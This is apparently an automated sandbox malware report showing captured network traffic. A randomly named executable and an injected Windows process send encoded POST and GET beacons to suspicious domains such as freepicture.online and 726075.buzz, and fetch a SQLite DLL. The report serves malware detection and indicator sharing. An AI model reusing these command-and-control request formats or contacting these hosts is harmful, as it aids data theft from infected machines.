                                        Sep 11, 2024 10:11:10.472023964 CEST8.8.8.8192.168.2.220xabbcNo error (0)www.kckartal.xyz104.21.20.125A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:10.472023964 CEST8.8.8.8192.168.2.220xabbcNo error (0)www.kckartal.xyz172.67.192.227A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:24.076240063 CEST8.8.8.8192.168.2.220x9fd1No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:37.645036936 CEST8.8.8.8192.168.2.220x62cbName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:38.671403885 CEST8.8.8.8192.168.2.220x943aName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:39.722929001 CEST8.8.8.8192.168.2.220x6362Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:40.756820917 CEST8.8.8.8192.168.2.220x7d16Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.726075.buzz
                                        • www.sqlite.org
                                        • www.freepicture.online
                                        • www.hm62t.top
                                        • www.golbasi-nakliyat.xyz
                                        • www.mfgamecompany.shop
                                        • www.quilo.life
                                        • www.qiluqiyuan.buzz
                                        • www.bola88site.one
                                        • www.kckartal.xyz
                                        • www.mizuquan.top

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.224916147.57.185.227801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:07.874480009 CEST455OUTGET /w9nd/?OlTXe=9dRK0h7YIJsGSRnhz+5Tf8djouf69SHBPHBwJCn+XP7nQ6BgyCo2HiS/iTx4FkUQNu4yOr79gxANSvRKU1dByDA5Y/6ByTaTkhQGev+u0gipHNJhsTWzO6tEXOan&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.726075.buzz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:08.800055027 CEST302INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:09:08 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "6663edd0-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.224916245.33.6.223803292C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:11.265733957 CEST275OUTGET /2018/sqlite-dll-win32-x86-3220000.zip HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Host: www.sqlite.org
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Sep 11, 2024 10:09:11.771234035 CEST249INHTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Date: Wed, 11 Sep 2024 08:09:11 GMT
                                        Last-Modified: Tue, 27 Mar 2018 18:53:19 GMT
                                        Cache-Control: max-age=120
                                        ETag: "m5aba931fs6daa9"
                                        Content-type: application/zip; charset=utf-8
                                        Content-length: 449193
                                        Sep 11, 2024 10:09:11.771295071 CEST1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 79 0f 37 4c f7 02 c2 ea df 04 00 00 2f 14 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a5 34 66 5a a5 34 66 5a 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6
                                        Data Ascii: PKy7L/sqlite3.defUT4fZ4fZuxd(ydrTv{sa,=3O>B*$&LT1?5<iUFKOb>sU80[YYy$p8kLu+5'pbID)t!;:
                                        Sep 11, 2024 10:09:11.771327019 CEST224INData Raw: 53 fd 2f a6 51 9e 34 2c 90 6f ca bc 7c 9b 94 9f e8 f0 cc f6 59 7a 4c a5 29 86 f5 cf df a8 d8 ec 59 9b ea e6 82 dd b7 0c f4 52 af 3a 56 24 0b 8b 58 2f f0 36 7d b2 56 5e 03 55 69 cd df a8 46 33 ee da 3a 7d a7 cd 3f d0 e0 b3 66 8e db 97 ff 00 50 4b
                                        Data Ascii: S/Q4,o|YzL)YR:V$X/6}V^UiF3:}?fPKy7L:Gsqlite3.dllUT4fZ4fZuxdxT89I&5*b1Q'L@4#*m1dI4;zz
                                        Sep 11, 2024 10:09:11.771358967 CEST1236INData Raw: 85 7c d0 7c 20 85 90 50 48 00 21 62 c4 33 9e 54 03 a1 f9 c4 cc bb d6 3e 67 92 09 f2 bb ef fb fe ff cf f3 7f 9e f7 79 5e 5a 33 e7 ec b3 f7 da df eb 6b af bd 56 e1 aa e7 4d 16 93 c9 c4 c3 7f e1 b0 c9 b4 d7 a4 ff f3 98 fe df ff 0b c2 7f 53 e7 ee 9b
                                        Data Ascii: || PH!b3T>gy^Z3kVMSjz/o7/=u?>Qa~pqS?z;LIH3`L42hzN0M7$rdatW79?;m?Yo7gN4bMYSXLTY99a$
                                        Sep 11, 2024 10:09:11.771429062 CEST1236INData Raw: 80 41 e4 fb 5e 86 01 36 89 6e 5c 02 a6 d0 ba f0 8c 35 b0 01 f7 61 81 aa ba 65 e2 0c 6c cc 54 13 5b d5 e1 19 8f c1 a7 e5 cb 49 43 55 bb 18 0f f9 b1 64 b8 1d 1e 7e e1 e8 5e a7 5e f9 b9 d5 d4 da 08 50 4b 1b 9f b7 38 aa 4c ff 0c ad 83 17 a2 3f c9 75
                                        Data Ascii: A^6n\5aelT[ICUd~^^PK8L?u,G6lT{U,#1,:dYO#b=\l.`+Z`VhJ;T}eNb,.7#B.f0H:^pq&F0W&h$H2hIR
                                        Sep 11, 2024 10:09:11.771462917 CEST1236INData Raw: 2a 36 31 b0 d0 23 44 87 34 f8 eb 47 62 61 1e c8 67 8a a3 bd 94 83 bd 29 e0 06 34 48 97 a3 c6 44 fc 3d d9 b7 4b 09 39 c6 0c 6b db b2 e7 eb 6f 6c 90 9f cc ce 30 1e a5 75 35 39 9c dc 7d 2e bb 44 7a 44 a8 cd 31 2b 5b cd 03 41 9c 4c ab b8 08 67 c2 b2
                                        Data Ascii: *61#D4Gbag)4HD=K9kol0u59}.DzD1+[ALgHr.jj~y*/^0BmuUU?'B?v&C6`e5C'>ug/&+\L:Iv'dyT1'kgd]%
                                        Sep 11, 2024 10:09:11.771497965 CEST1236INData Raw: a2 4d 2b 95 2f 59 f0 69 1f 53 00 6c d5 6b 33 98 b9 e2 65 c0 f0 96 61 2d 9e 14 b9 fb a2 dc c2 95 c9 db e7 98 ca 88 37 45 4a 58 45 3a 57 97 86 ea e1 6b 89 21 0d a1 a2 20 8d f8 2e a3 e0 49 8b 9c 4c cb 62 67 0d 2a b2 d1 e5 0b 50 db 32 e3 32 b4 09 d7
                                        Data Ascii: M+/YiSlk3ea-7EJXE:Wk! .ILbg*P22{Q)qII0\ro]t87 9vZbSSI]N*=9u\;`(8d~@6]BvA})x^@GSFKtk YSvb[id !c
                                        Sep 11, 2024 10:09:11.771532059 CEST1236INData Raw: da da ef 4c 42 02 69 a8 04 28 b4 83 18 03 8b 4a a8 cd 84 cd 45 fd 3d 72 b8 82 04 7a 37 df 42 86 94 55 56 b9 bb 82 f8 7a 73 6b cc c0 fc 93 e6 fa 0b 71 f2 e7 15 f1 83 ee 0e cc c1 57 d6 95 7f 86 2c 4e 18 04 22 a1 36 97 93 87 2a 00 09 37 6d 5e a7 e4
                                        Data Ascii: LBi(JE=rz7BUVzskqW,N"6*7m^ZO+ ,'}aJF8k4p(qQ2B n'sPV%<P)[yqA=Lm@9'<u_o<e$gacGcn-PT#00Bmx wco
                                        Sep 11, 2024 10:09:11.771568060 CEST552INData Raw: 0e 7d ae 7f 12 6a 1f e1 f4 cf 80 fa e3 db c6 f3 30 c9 ac 11 21 d1 47 b8 71 10 cf 5c aa ef 46 0a 17 95 91 09 8c bf 62 7a 3c 0f 07 5f 49 83 50 bb c8 cc 80 01 6c 0b fc dd 3f cb a8 e0 bc 33 aa 1c 22 45 ed 09 61 ff b7 b1 05 d4 63 36 f2 5c b0 0a 2d f1
                                        Data Ascii: }j0!Gq\Fbz<_IPl?3"Eac6\-'@tn/i/7:Ll 4Je<WF_vc*=oa{ljJ'IV<p1~98mV@@l0^9.*fSv^<]VS(0Z)-
                                        Sep 11, 2024 10:09:11.771601915 CEST1236INData Raw: f0 73 2b eb c4 b8 ec 3b 44 8b 57 bb 04 08 f4 16 90 01 ad 91 26 fb 7b 91 ac be f4 19 93 34 be 0b a4 15 b0 50 30 3b d9 24 95 28 3b e6 72 ae d3 57 95 1e 10 53 59 69 d1 28 dd a7 ae d2 8b de 1a cc 9e 63 a2 fe 3e 29 b5 aa 5d 59 3a 57 b7 b2 11 a7 93 16
                                        Data Ascii: s+;DW&{4P0;$(;rWSYi(c>)]Y:Wb{1ti?dg:b",I9X9UcEd)%8K\&<qD?,S)I8B=,N313Mc%9Q:HZ$4YaM3 x7\RAF;~2d7YR<=-
                                        Sep 11, 2024 10:09:11.776653051 CEST1236INData Raw: 3d b1 51 e2 61 e1 dd bb 2b bc ee 47 4f 96 45 9e bf 2b fd e8 71 fd 99 8c ec 3a 0f 68 d2 b4 6b 44 fc e1 0f 4c 42 55 39 bc 84 64 dc 13 f5 ef e6 86 fe 15 de de f5 1d 40 30 a1 b5 fa 33 82 09 2d d7 9f 11 4c 28 1f 4f 84 06 c4 d5 c1 d1 dc a6 58 ae a2 18
                                        Data Ascii: =Qa+GOE+q:hkDLBU9d@03-L(OX%G7(Oyfq"+}d@_vl*<P%hbcxjZYCFyaw!WKUIN<SZZqTY;]mvCA`;54TDNulm^Mb


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.224916389.58.49.1801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:18.870980024 CEST2472OUTPOST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 44 69 70 78 6d 6f 37 4f 46 64 39 70 71 6d 31 34 35 56 72 4d 72 41 30 79 53 64 30 33 48 63 2f 48 6d 58 4d 32 31 51 44 31 34 63 54 34 4b 6d 30 5a 4c 2f 4a 47 58 4c 74 49 53 32 79 4b 44 39 39 74 44 6f 36 56 30 5a 70 68 69 2f 46 44 64 35 53 66 74 47 49 6d 69 53 57 46 42 46 68 33 59 70 46 77 52 59 34 54 30 4d 57 35 51 78 43 36 68 48 4f 54 31 57 4b 31 4a 6f 46 58 62 4e 34 6a 50 36 44 4c 6c 34 58 66 58 52 6b 65 4c 58 75 39 59 78 54 55 6e 75 74 6a 61 44 76 6e 44 6b 36 2b 47 75 4f 6c 73 4a 50 31 51 52 43 2b 37 36 6b 66 77 58 68 4e 2f 47 53 7a 38 48 4f 39 42 2b 4c 6b 79 64 30 63 68 73 47 65 72 6a 70 53 58 45 72 74 6a 55 65 42 51 79 46 65 4c 43 4f 34 49 4f 59 2b 37 34 34 53 52 4a 63 6d 6c 6a 64 4d 4c 38 71 6e 53 4c 2b 7a 56 35 75 78 50 48 69 66 4c 51 73 5a 46 65 68 71 70 7a 55 4b 5a 54 68 54 4c 4e 43 4c 41 34 41 4b 55 75 46 45 34 41 4e 2f 4d 54 41 55 55 43 69 61 6e 70 2b 64 4b 32 49 63 62 6d 39 38 64 76 43 5a 55 4d 35 45 4f 32 56 51 76 35 4b 6e 4f 32 43 [TRUNCATED]
                                        Data Ascii: OlTXe=Wh+VGNuLBIYa/Dipxmo7OFd9pqm145VrMrA0ySd03Hc/HmXM21QD14cT4Km0ZL/JGXLtIS2yKD99tDo6V0Zphi/FDd5SftGImiSWFBFh3YpFwRY4T0MW5QxC6hHOT1WK1JoFXbN4jP6DLl4XfXRkeLXu9YxTUnutjaDvnDk6+GuOlsJP1QRC+76kfwXhN/GSz8HO9B+Lkyd0chsGerjpSXErtjUeBQyFeLCO4IOY+744SRJcmljdML8qnSL+zV5uxPHifLQsZFehqpzUKZThTLNCLA4AKUuFE4AN/MTAUUCianp+dK2Icbm98dvCZUM5EO2VQv5KnO2CAH4awI8XKWa9Y3vPmm9q8vz53RwmbdcWhu2HQHeA3nFnEUbKYza9wCYL4Lehwp0FoqIPmi02BTHXTsLIiRFG6g2RCK3MDGCLmdFcAq5YbEh+OqJS+iLqhynsWZOtpfDl1d9bgnpLcO6YyNi3O3sJ7FB+oBU1zsoABFFS7cJNGlGfMi8bQoF4Uf0P2K89wZjcYt5OnQPfujue5GuGKwXDVUHPDkiFnZYVgxs8dSgPayS1Wih6B2H5DtxK7fsD1v7tBPFpp8e93l2rWp7065kie1I4hfKahDPR1dD3Ipld0t/YqpIG3iPO46VYFkSWd8N3G9+ML9Ja2jfQpNkkS5yiH7AU/StSQeUrSaLLgBHWqaJUyPu5G28ThUpy5ugUghutHVwIY6lBPAtunc+mLhXgZf9LkjdRuY6Qt10RjtMm7aM3IrdO1qI4YjSBlVOIPuJ4hmYvLMPNTGuyXuIK4MRnH1Dk3++SMu9pxW6dMaRxmUT3E7Pole5jcgcYXq995AxEnZhFD2dW0L9wmGlDHS+WmuW5pL4uQw6etSAxZqkQeqNfe1Pxqz/qbwfWYoPi2Ck4Lej/JYYU9KEJRpXEMDjesDtfMeJ1KscqvXR4lyoaIQEdcOuYFPz8GSU09IVVGB4+Qpg6XgUL+jbagoHJGhvLVm4BbYrUG82Wcc [TRUNCATED]
                                        Sep 11, 2024 10:09:18.877124071 CEST230OUTData Raw: 35 73 36 6d 4b 6a 6b 38 53 75 4b 59 72 37 58 33 71 51 41 6e 53 51 68 66 73 31 2f 65 66 73 49 75 7a 70 42 74 6f 2b 59 74 4b 4a 6e 69 75 73 42 43 39 73 78 4b 58 62 6e 4f 39 32 41 69 4c 62 78 5a 42 46 48 54 65 52 68 6b 6e 77 37 33 30 6b 62 31 49 62
                                        Data Ascii: 5s6mKjk8SuKYr7X3qQAnSQhfs1/efsIuzpBto+YtKJniusBC9sxKXbnO92AiLbxZBFHTeRhknw730kb1Ib7EympBYtJN55sAttj61vOx5GydjVpIrXjOOXgbpHfysWTVqFVvrA3wFV3VYjDAVbABfbxk7nWU3aqIzh9KBN5qz5ab4Mn/jLQ71+GWCeVc32bfEqTQKngGjHZKhwLLytNFl4HYm4ceFiYu+5UhkZ
                                        Sep 11, 2024 10:09:19.490782976 CEST360INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:19 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.224916489.58.49.1801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:21.403691053 CEST741OUTPOST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 70 51 59 6b 31 47 71 58 76 74 64 58 36 7a 56 76 39 4a 61 61 63 32 2b 35 48 76 58 65 6f 51 3d 3d
                                        Data Ascii: OlTXe=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNpQYk1GqXvtdX6zVv9Jaac2+5HvXeoQ==
                                        Sep 11, 2024 10:09:22.048521042 CEST360INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:21 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.224916589.58.49.1801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:23.945384026 CEST2472OUTPOST /xcfw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Origin: http://www.freepicture.online
                                        Referer: http://www.freepicture.online/xcfw/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 47 69 4f 6b 37 4a 50 31 52 52 42 38 72 36 6e 53 51 58 68 53 76 47 4d 7a 38 47 66 39 42 2b 4c 6b 79 68 30 63 78 73 47 65 76 50 71 59 33 45 72 67 44 56 63 43 67 50 30 65 4c 58 74 34 49 65 69 2b 6f 55 34 52 55 6c 63 30 46 6a 64 46 62 38 57 6e 53 4c 4a 35 31 34 39 78 50 66 71 66 50 30 38 5a 46 65 68 71 72 72 55 49 2f 2f 68 56 62 4e 43 48 67 34 42 63 6b 75 47 45 34 30 76 2f 4d 4c 41 55 57 69 69 62 56 42 2b 62 4a 65 4a 49 37 6d 38 34 64 76 63 54 30 4e 6a 45 4f 72 4f 51 76 42 67 6e 4f 6d 43 [TRUNCATED]
                                        Data Ascii: OlTXe=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+GiOk7JP1RRB8r6nSQXhSvGMz8Gf9B+Lkyh0cxsGevPqY3ErgDVcCgP0eLXt4Iei+oU4RUlc0FjdFb8WnSLJ5149xPfqfP08ZFehqrrUI//hVbNCHg4BckuGE40v/MLAUWiibVB+bJeJI7m84dvcT0NjEOrOQvBgnOmCAFQajdAXW2a8VXvD32xm8vqo3RkQbeIWn/2HZiyD43FlBUb6ODaHwCNs4K+hxcAFmLoPhRcpIDHQFcLfsxF06giZCLniD0aLntFcNvlbGkh7U6IRpyL4hymXWYC9pO7l1elbg1BLcO6bj9iqVng/7F96oBIfzuwABU1S7dJNBFGfUy8YaIFYUfh02PJGwp3cWqJO3iXfmjum7GuHXAWvVU3PDmuznaoVgVA8MDgPWSSLIyhlB2HPDt1G7fcp1sPtBKppv5+9+F2oaJ7wsJkBe2pmhffNhCHR09j3PYld0N/aopIGiyP/46NiFgCsd4Z3GMuMOtJZxjfXrNknDpywH7QU/ShSQaorStfLqQHWiKJWv/uzQG4zhU5I5vlJgm6tGEwIOodeAQtoic+oPhXIZf9fknwauL+QukURvo4n3aMwDLddo6JQYjDklUqYPdd4hnovL5bNU2uyXuIF4MR8H1/w3/PFMu9p3CudMoJxu0TIG7O6he44chp5XpM15BdEnMVFD2dV5b9zrmlAHS6hmuWbpL0uRD2etB4xXvwQYKNfZ1PulT/rbweTYpDI2AA4LuD/F+kV1aFuAZXVVSfFsDgaMet1Kb8q9yl4lCoaCQEeE+vcKv/wGSYe9Kt7G1c+CKI6HXgK1zbbkoHLGhq1VmAJbYzEG/GWc8 [TRUNCATED]
                                        Sep 11, 2024 10:09:23.950862885 CEST1694OUTData Raw: 39 73 36 6d 61 6a 6b 37 75 75 4b 6f 72 34 62 6e 71 64 49 48 53 4f 34 50 73 35 2f 65 66 57 49 71 6d 4d 42 73 41 2b 59 37 4f 4a 77 44 75 73 42 79 38 6e 6b 61 58 49 78 2b 78 61 41 69 58 63 78 5a 77 79 45 6e 43 52 6a 58 66 77 2b 45 63 6b 63 56 49 59
                                        Data Ascii: 9s6majk7uuKor4bnqdIHSO4Ps5/efWIqmMBsA+Y7OJwDusBy8nkaXIx+xaAiXcxZwyEnCRjXfw+EckcVIY2kz5pBURJOBPsEhXjLpvPB5G2fbWtIrRgOOegboqfz4STQaVVtXA3ydVw1YsEwVZMhfBxk/OWUv0qIDh9OZN7OX5fb4M4vjOab1dZGGZVYKpJqEWUHai+FXtY7EIAq7ZGGJqJpegJv0ZB5uzZklspgtJJSg1wATUg
                                        Sep 11, 2024 10:09:24.583694935 CEST360INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:24 GMT
                                        Server: Apache
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.224916689.58.49.1801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:09:26.490036964 CEST462OUTGET /xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.freepicture.online
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:09:27.126241922 CEST360INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:09:27 GMT
